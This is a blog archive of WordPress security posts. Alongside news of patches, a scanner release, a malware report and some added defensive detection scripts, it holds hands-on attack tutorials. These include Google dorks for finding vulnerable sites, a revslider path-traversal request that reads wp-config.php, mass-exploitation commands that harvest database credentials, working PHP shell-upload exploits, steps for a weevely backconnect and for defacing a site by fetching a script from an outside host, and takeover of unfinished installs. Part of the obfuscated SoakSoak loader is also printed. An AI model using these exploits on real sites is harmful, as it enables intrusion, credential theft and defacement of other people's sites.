Showing posts with the label wordpress. Show all posts

Plecost: Wordpress Vulnerabilities Finder

There are a huge number of WordPress installations around the world. Most of them are exposed to attack and can be turned into a source of viruses, malware or illegal porn without the knowledge of the blog owner.
This project tries to help sysadmins and blog owners make their WordPress installations a bit more secure.

Plecost is a vulnerability fingerprinting tool and vulnerability finder for the WordPress blog engine.

What's new?

Plecost version 3 adds a lot of new features and fixes, such as:
  • Fixed a lot of bugs.
  • New engine: no threads and no dependencies, yet it runs faster. It uses Python 3 asyncio and non-blocking connections, and it also consumes less memory. Incredible, right? :)
  • Changed CVE update system and storage: Plecost now gets vulnerabilities directly from NIST and creates a local SQLite database with information filtered for WordPress and its plugins.
  • WordPress vulnerabilities: Plecost now also handles vulnerabilities in WordPress itself (not only in plugins).
  • The local vulnerability database is queryable: you can look up the vulnerabilities for a specific WordPress version or plugin using the local database.

Installation

Installing Plecost is easy:
$ python3 -m pip install plecost

Remember that Plecost 3 only runs on Python 3.

Quick start

Scanning a web site is simple:
$ plecost http://SITE.com
A slightly more complex scan, increasing verbosity and exporting the results in JSON or XML format:
JSON
$ plecost -v http://SITE.com -o results.json
XML
$ plecost -v http://SITE.com -o results.xml



 Download and read more at:

~ Tuesday, 2 June 2015, 0 comments

WordPress Patched Zero Day XSS Vulnerability With New 4.2.1 Security Release



WordPress 4.2.1 version is now available. This is a critical security release for all previous versions and we strongly encourage you to update your sites immediately.

A few hours ago, the WordPress team was made aware of a cross-site scripting vulnerability, which could enable commenters to compromise a site. The vulnerability was discovered by Jouko Pynnönen.

WordPress 4.2.1 has begun to roll out as an automatic background update, for sites that support those.

For more information, see the release notes or consult the list of changes.

Download WordPress 4.2.1 or venture over to Dashboard → Updates and simply click “Update Now”.

What is Cross Site Scripting (XSS)?
'XSS', also known as 'CSS', stands for Cross Site Scripting. It is a very common vulnerability found in web applications. XSS allows the attacker to insert malicious code. There are many types of XSS attacks.

Read more here about Cross Site Scripting with Example.

WordPress users can also temporarily disable comments until the patch has been issued by the WordPress security team.

Source: Wordpress

~ Monday, 27 April 2015, 0 comments

Exploring Wordpress Theme Arbitrary File Download Vulnerability Exploits Available


Exploring Wordpress Theme Arbitrary File Download Vulnerability + SCANNER INURLBR / EXPLOIT INURL A.F.D Verification

Wordpress Theme U-Design Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/u-design/"
ACCESS: http://1337day.com/exploit/23143

-------------------------------------------------------------------------------------------

Wordpress Theme Terra Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/terra/"
ACCESS: http://1337day.com/exploit/23142
-------------------------------------------------------------------------------------------

Wordpress Theme Pindol Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/pindol/"
ACCESS: http://1337day.com/exploit/23144
-------------------------------------------------------------------------------------------

All of the themes above fail through the same revslider plugin.

POC:
http://[target]/[path]/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL

The exploit developed can check about 20 themes and uses the following standard check.

POC -> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
This is the same as the 0day mentioned above.

[Exploit ACCESS]
http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
Please download the exploit and name the file exploit.php.

Now let's use the inurlbr scanner as a mass explorer.
[SCANNER INURLBR]
https://github.com/googleinurl/SCANNER-INURLBR

INURLBR command usage:
Ex: php inurlbr.php --dork 'you dork' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/u-design/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/terra/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/pindol/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

Brief introduction --comand
--comand-vul Every vulnerable URL found will execute this command parameters.
     Example: --comand-vul {command}
     Usage:   --comand-vul 'nmap sV -p 22,80,21 _TARGET_'
              --comand-vul './exploit.sh _TARGET_ output.txt'
 --comand-all Use this commmand to specify a single command to EVERY URL found.
     Example: --comand-all {command}
     Usage:   --comand-all 'nmap sV -p 22,80,21 _TARGET_'
              --comand-all './exploit.sh _TARGET_ output.txt'
    Observation:
    _TARGET_ will be replaced by the URL/target found, although if the user
    doesn't input the get, only the domain will be executed.
   _TARGETFULL_ will be replaced by the original URL / target found.

-------------------------------------------------------------------------------------------

INURLBR ADVANCED CONTROL

php inurlbr.php --dork 'YOU DORK revslider' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"'




Source: Inurl
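
For site owners, the request shown in the POC above leaves a recognisable trace in the web server access log. The following Python sketch is an added example, not part of the original post or of any tool it mentions; it assumes Combined Log Format and uses constructed log lines. It flags revslider_show_image requests whose img parameter contains path traversal or names a non-image file, including percent-encoded variants.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*" (\d{3}) (\S+)')
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif", ".bmp")

def decode_fully(value, rounds=3):
    """Undo nested percent-encoding such as %252e%252e%252f."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(target):
    """Return why a request target abuses revslider_show_image, or None."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/wp-admin/admin-ajax.php"):
        return None
    query = parse_qs(parts.query, keep_blank_values=True)
    if "revslider_show_image" not in (a.lower() for a in query.get("action", [])):
        return None
    for img in query.get("img", []):
        img = decode_fully(img).replace("\\", "/").lower()
        if ".." in img.split("/"):
            return "path traversal in img"
        if not img.endswith(IMAGE_EXT):
            return "non-image file requested"
    return None

def scan(lines):
    """Return findings; 'disclosed' means the server answered 200 with a body."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, when, target, status, size = m.groups()
        reason = classify(target)
        if reason:
            disclosed = status == "200" and size.isdigit() and int(size) > 0
            findings.append({"ip": ip, "time": when, "reason": reason, "disclosed": disclosed})
    return findings

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Jan/2015:10:02:11 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3187 "-" "curl/7.38.0"',
    '203.0.113.7 - - [21/Jan/2015:10:02:12 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=%252e%252e%252fwp-config.php HTTP/1.1" 404 0 "-" "curl/7.38.0"',
    '198.51.100.20 - - [21/Jan/2015:10:05:40 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=uploads/2015/01/banner.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [21/Jan/2015:10:05:41 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A finding with disclosed set to True means wp-config.php was probably served, so the database credentials and secret keys it holds should be rotated after the plugin is updated.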

~ Wednesday, 21 January 2015, 0 comments

100’s of Thousands Wordpress Sites infected with Dangerous Malware

About 100,000 or more websites running the WordPress content management system have been compromised by mysterious malware that turns the infected sites into attack platforms that can target visitors, security researchers said.

Source: Sucuri


The campaign has prompted Google to flag more than 11,000 domains as malicious, but many more sites have been detected as compromised, according to a blog post published Sunday by Sucuri, a firm that helps website operators secure their servers. Researchers have yet to confirm the cause of the infection, but they suspect it's related to a vulnerability in Slider Revolution, a WordPress plugin, that was disclosed in early September.


The in-the-wild attack observed by Sucuri causes infected sites to load highly obfuscated attack code on every webpage that looks like this:

eval(decodeURIComponent
("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));





The code causes pages to download the malicious payload from hxxp://soaksoak.ru/xteas/code. Judging from some of the reader comments, some administrators were surprised to find that the sites they oversee were infected. Sucuri's free site check scanner will detect sites that are actively compromised. Disinfection involves removing malicious code added to a script located at wp-includes/template-loader.php. WordPress admins who use the Slider Revolution plugin should also ensure it's up to date.

Read Full Article on arstechnica
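
To help administrators find this kind of injection in their own files, the following Python sketch searches PHP and JavaScript files for the eval(decodeURIComponent("%..")) pattern shown above, decodes the payload and reports what it would load. It is an added example, not code from Sucuri or from the original article; the sample file and the loader.example URL are constructed, and the xxyyzz_petushok marker is the script id obtained by decoding the fragment quoted above.

```python
import os
import re
from urllib.parse import unquote

# eval(decodeURIComponent("%28%0D...")), tolerating the line break seen in the sample above.
LOADER_RE = re.compile(
    r"""eval\s*\(\s*decodeURIComponent\s*\(\s*(["'])((?:%[0-9A-Fa-f]{2}){20,})\1""")
# Strings expected in a decoded script-injection loader.
MARKERS = ("createElement", "appendChild", "xxyyzz_petushok")
URL_RE = re.compile(r"""https?://[^\s'"]+""")

def find_loaders(text):
    """Return one finding per fully percent-encoded eval() payload in text."""
    findings = []
    for m in LOADER_RE.finditer(text):
        decoded = unquote(m.group(2))
        findings.append({
            "line": text.count("\n", 0, m.start()) + 1,
            "markers": [k for k in MARKERS if k in decoded],
            "urls": URL_RE.findall(decoded),
            "decoded": decoded,
        })
    return findings

def scan_tree(root, extensions=(".php", ".js")):
    """Map file path -> findings for every matching file under root."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(extensions):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_loaders(fh.read())
                if hits:
                    results[path] = hits
    return results

def percent_encode_all(script):
    """Encode every byte as %XX, the way the observed payload is encoded."""
    return "".join("%%%02X" % b for b in script.encode("utf-8"))

# Constructed sample: a script-tag loader pointing at a placeholder host.
SAMPLE_SCRIPT = ("(\r\nfunction()\r\n{\r\n\tvar head=document.getElementsByTagName('head')[0];"
                 "\r\n\tvar script=document.createElement('script');"
                 "\r\n\tscript.src='http://loader.example/code';"
                 "\r\n\tscript.id='xxyyzz_petushok';\r\n\thead.appendChild(script);\r\n}()\r\n);")
SAMPLE_FILE = ('<?php /* constructed infected file */ ?>\n<script>\neval(decodeURIComponent\n("'
               + percent_encode_all(SAMPLE_SCRIPT) + '"));\n</script>\n')

if __name__ == "__main__":
    for hit in find_loaders(SAMPLE_FILE):
        print(hit["line"], hit["markers"], hit["urls"])
```

Running scan_tree over the WordPress root covers wp-includes/template-loader.php, the file named above, along with any other PHP or JavaScript file carrying the same pattern.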


~ Monday, 15 December 2014, 0 comments

Exploit Wordpress: WPDataTable Unauthenticated Shell Upload Vulnerability and Not Acceptable Bypass




Uploading Shell

Requirement:
    1-Python Any Version (v2.7 recommended)
    2-Exploit Script
    3-Backdoor

Steps:
    1- Download Exploit
        wget http://www.homelab.it/wp-content/uploads/2014/11/wpdatatables_shell_up.py_.txt

    2- Change to executable Python extension
        mv wpdatatables_shell_up.py_.txt wpdatatables_shell_up.py

    3- Find Vulnerable Target using dork
        inurl:/plugins/wpdatatables
        inurl:codecanyon-3958969
        index of "wpdatatables"
        index of "codecanyon-3958969"

    4- Open cmd/terminal and run exploit wptable.py
        python wpdatatables_shell_up.py -t targetsite.com -f shell.php

    5- Shell Upload to
        http://targetsite.com/wp-content/YEAR/MONTH/shell.php


Bypassing Not Acceptable
Requirements:
    1- Weevely Stealth Shell
    2- Remote Deface Script (.txt)


Steps:
    1- Upload weevely stealth shell using the exploit script

    2- Backconnect using weevely

    3- CD to root directory

    4- Backup index.php
        mv index.php indexBAK.php

    5- Import Deface Script
        wget http://yourhosting.com/index.txt -O index.php


~ Monday, 24 November 2014, 0 comments

WordPress 4.0.1 Released to Address Vulnerabilities and Cross-Site Scripting Flaw

The critical security release addresses a serious cross-site scripting (XSS) bug identified and reported by Jouko Pynnonen of the Finland-based IT company Klikki Oy on September 26. The vulnerability affects WordPress 3.9.2 and earlier versions which, according to the latest statistics from WordPress, account for nearly 86% of installations. WordPress 4.0, released in early September 2014, is not affected. 




"An attacker could exploit the vulnerability by entering carefully crafted comments, containing program code, on WordPress blog posts and pages. Under default settings comments can be entered by anyone without authentication (login)," Klikki Oy said in a press release. "Program code injected in comments would be inadvertently executed in the blog administrator's web browser when they view the comment. The rogue code could then perform administrative operations by covertly taking over the administered account."

A proof-of-concept published by the company shows that an attacker can exploit the vulnerability to create new administrator accounts, change the password of the current administrator, and execute arbitrary PHP code on the server.

"Exploitability without login, under default settings, and the server-side impact make this probably the most serious WordPress core vulnerability that has been reported since 2009," Klikki Oy said.

Technical details on the critical XSS vulnerability are available in an advisory published by the Finnish company on November 20.

Millions of WordPress sites around the web are being updated to 4.0.1 right now and older releases will be updated to 3.9.3, 3.8.5, or 3.7.5, as outlined in Andrew Nacin’s security release announcement. If you don’t want to wait for the automatic update, you can always go to Dashboard → Updates in the admin and update immediately.

The security update also fixes 23 flaws from the WordPress 4.0 version among others.

Read Full article at SECURITYWEEK

~ Sunday, 23 November 2014, 0 comments

Exploit WordPress: Wp-Install


 
Dorks:
 inurl:/wp-admin/install.php
 inurl:/wp-admin/install.php & intext:welcome -github -code

How to Exploit?
  1. First, as usual, copy one of the dorks given above and paste it into Google.
  2. Choose any site.
  3. If your target is http://www.example.com/wp-admin/install.php and the webpage is shown as in the picture below, that means the site might be vulnerable.
  4. But if the webpage is shown as in the picture below, it means the site is not vulnerable.
  5. Fill in the Site Title, Username, Password, and your Email Address and click Install WordPress.
  6. If the installation succeeds, you can log in to the admin panel.
  7. Otherwise, you will get an error message as below.

~ Friday, 17 October 2014, 0 comments

Wordpress 0day Exploiter [Original]






Wordpress 0day Exploiter is a tool that enables you to register as a new admin on a WordPress site that has the bug in the Ajax.php file.

 How to create dorks?
It's very easy to create the dorks. The list of vulnerable themes is already provided in the rich text box on the right, so you just need to add the theme name.

Dork:
inurl:/wp-content/themes/[theme_name]
Example:
inurl:/wp-content/themes/appius

How to use the tools?
It's easy. Once you have found your target:

1- Simply paste the site URL, theme name, and your email in the textbox

2- Click on Confirm > Exploit

3- If your target is vulnerable, the "Register" button will be enabled

4- Click on Register and the webbrowser will bring you to the registration page

5- Enter your username and email

6- Check your email inbox for the confirmation and the password for your account.

7- Login to the site and there you go :)

8- You also can upload shell into the site. [How to upload shell in Wordpress site] 



~ Monday, 29 September 2014, 0 comments

Creating an iOS Application Using Wordpress





With a whole lot of room for incessant innovation in Wordpress, the web development community is consistently striving to make WP spread its wings further.


And this is where the concept of using Wordpress to create mobile apps comes into existence. Yes, there are plugins and granted, they are great, but if you are willing to compromise control and let the third party tools dictate terms, you might as well go ahead with the likes of AppPresser and Mobiloud. 
 

But, when being in the driver's seat is on your agenda, segue on to the following partially plugin-assisted ways to create iOS apps using Wordpress:



Build a Web Application Theme that Stays True to the Most Basic Strictures

 


There is a standard conceptualization (or should I say conceptual standardization?) of mobile apps – a mobile app is the one that runs and appears great on a mobile device. Though, this hardly covers the native app concepts that exist at the very fibre of mobile apps of all sorts. 
 

What needs to be clearly understood is whether the guy who is buying your app to sell it to his customers considers the standard web app as the iOS app he is expecting you to roll out. If that indeed is the case, you have your task cut out (it hardly is a task) – just code a theme that will let your content be displayed on a Smartphone screen in a manner most clean and clutter-free. 
 

OR, you can use PhoneGap with technologies like CSS, JavaScript and HTML to create a shell application. Accompanying it, you will need a browser that shouldn't display an address bar and something that leads to the app you have created. The final app you have through this method may not be something you would be immensely proud of, but you have just created your first mobile app using few web technologies, that alone is worth the price of admission. However, if that doesn't please you enough, there are more ways to follow:


Wordpress Will Collect Data for You. Now Input the Same to an App Generator

 




Here is how it goes:

To begin with, you create custom posts in the WordPress CMS. The custom fields are then placed where they belong. You can then move on to creating a custom plugin that lends a sense of structure to the whole data setup. And then the app generators come into play. Using these app generators, you have the wherewithal to compile the apps with their own compilers. The data from WordPress can then be fed in using the URLs, which can be done either with plugins or via the WordPress XML-RPC, and creating apps becomes a much more feasible task after that.


Wordpress Will Collect Data for You. Now, Create the iPad side of things Natively

 


Well, if you don't have a whole lot of idea about this one, you have the option of branching out to a development company that has the expertise to blend the Wordpress strategy with the mobile technology in the most seamless and effective fashion and thus create exceptional native apps. 
 

All said and done, there are a bunch of things that need to be off the deck before you swing-start the development process. Coalescing data from the WordPress URLs has to be done in a precise manner, and you must be appropriately equipped to handle the responses. The UI operations also have to be handled with utmost care and, not to mention, do steer clear of all the possible oversights.

Author:
Sarah Parker is a veteran tech savvy content writer associated with Designs2Html Ltd, where you can opt for PSD to Wordpress conversion services. Also, in case of availing PSD to Magento Theme Conversion services, you can get in touch with her.

~ Friday, 22 August 2014, 0 comments

WordPress zarzadzanie_kontem Plugin


~ Friday, 4 July 2014, 0 comments

Exploit Wordpress: Echea Theme - File Upload Vulnerability


Dork: inurl:/wp-content/themes/echea/

Shell Uploaded to: 
http://www.site.com/wp-content/themes/echea/js/cufon-fonts/uploaded/custom_shell.php.jpg 

Exploit:

<?php
// Sends a local file to the theme's bundled uploadify.php as the multipart field "Filedata".
$uploadfile="shell.php.jpg";
$ch = curl_init("http://127.0.0.1/wp-content/themes/echea/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
 
This exploit is the same as my previous post, so check it! :P



~ Thursday, 15 May 2014, 0 comments

Exploit Wordpress:Complete Gallery Manager 3.3.3 - File Upload Vulnerability



Things Required:
-XAMPP
-Shell
-Exploit script.php

Dork: inurl/wp-content/plugins/complete-gallery-manager
Shell Uploaded to : http://wordpress.com/wp-content/2013/09/up.php

Exploit :


<?php
// Sends a local file to the plugin's upload-images.php as the multipart field "qqfile".
$uploadfile="up.php";
$ch = curl_init("http://wordpress.localhost:8080/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Just watch the video if you still don't understand :)

 

~ 0 comments

Exploit Wordpress: Salespresspro Theme - File Upload Vulnerability







POC:
Dork: inurl:/themes/salespresspro
          inurl:/wp-content/themes/salespresspro/

Exploit: /wp-content/themes/salespresspro/headerimgbgblog-upload.php  

This exploit is the same as the previous exploit that i posted, please check them if you can't understand.
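
The upload flaws in the posts above (WPDataTable, Echea, Complete Gallery Manager, Salespresspro) all leave a script file in a directory meant for uploaded media, such as custom_shell.php.jpg under an uploaded/ folder or up.php under a YEAR/MONTH folder. The following Python sketch is an added example for administrators auditing their own installation, not code from the original posts; the directory heuristics and the sample tree are constructed from the paths quoted on this page. It flags script extensions, double extensions and PHP code hidden in files with a non-script name.

```python
import os
import re

SCRIPT_EXT = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}
PHP_TAG = re.compile(rb"<\?(php|=)", re.I)
# Upload locations: uploads/, uploaded/, or a YEAR/MONTH folder such as wp-content/2013/09.
DATED_DIR = re.compile(r"(^|/)(19|20)\d\d/(0[1-9]|1[0-2])(/|$)")

def is_upload_dir(rel_dir):
    rel_dir = rel_dir.replace(os.sep, "/").lower()
    parts = rel_dir.split("/")
    return "uploads" in parts or "uploaded" in parts or bool(DATED_DIR.search(rel_dir))

def audit_file(path):
    """Return the reasons a file in an upload directory looks like a dropped script."""
    exts = ["." + part for part in os.path.basename(path).lower().split(".")[1:]]
    is_script = bool(exts) and exts[-1] in SCRIPT_EXT
    reasons = []
    if is_script:
        reasons.append("script extension")
    elif any(ext in SCRIPT_EXT for ext in exts[:-1]):
        reasons.append("double extension")
    with open(path, "rb") as fh:
        head = fh.read(4096)
    if not is_script and PHP_TAG.search(head):
        reasons.append("PHP code in non-script file")
    return reasons

def audit_uploads(root):
    """Map relative path -> reasons for every suspicious file in upload directories."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        if not is_upload_dir(rel_dir):
            continue
        for name in files:
            reasons = audit_file(os.path.join(dirpath, name))
            if reasons:
                findings[os.path.join(rel_dir, name).replace(os.sep, "/")] = reasons
    return findings

# Constructed sample tree, named after the paths quoted on this page.
SAMPLE_TREE = {
    "wp-content/themes/echea/js/cufon-fonts/uploaded/custom_shell.php.jpg": b"<?php /* constructed */ ?>",
    "wp-content/2013/09/up.php": b"<?php /* constructed */ ?>",
    "wp-content/uploads/2014/05/photo.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF",
    "wp-content/themes/echea/functions.php": b"<?php /* legitimate theme code */",
}

def make_sample_tree(root):
    for rel, data in SAMPLE_TREE.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
```

Call make_sample_tree on an empty temporary directory and then audit_uploads on it to see the two planted files reported while the real image and the theme's own functions.php are left alone.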

  

~ 0 comments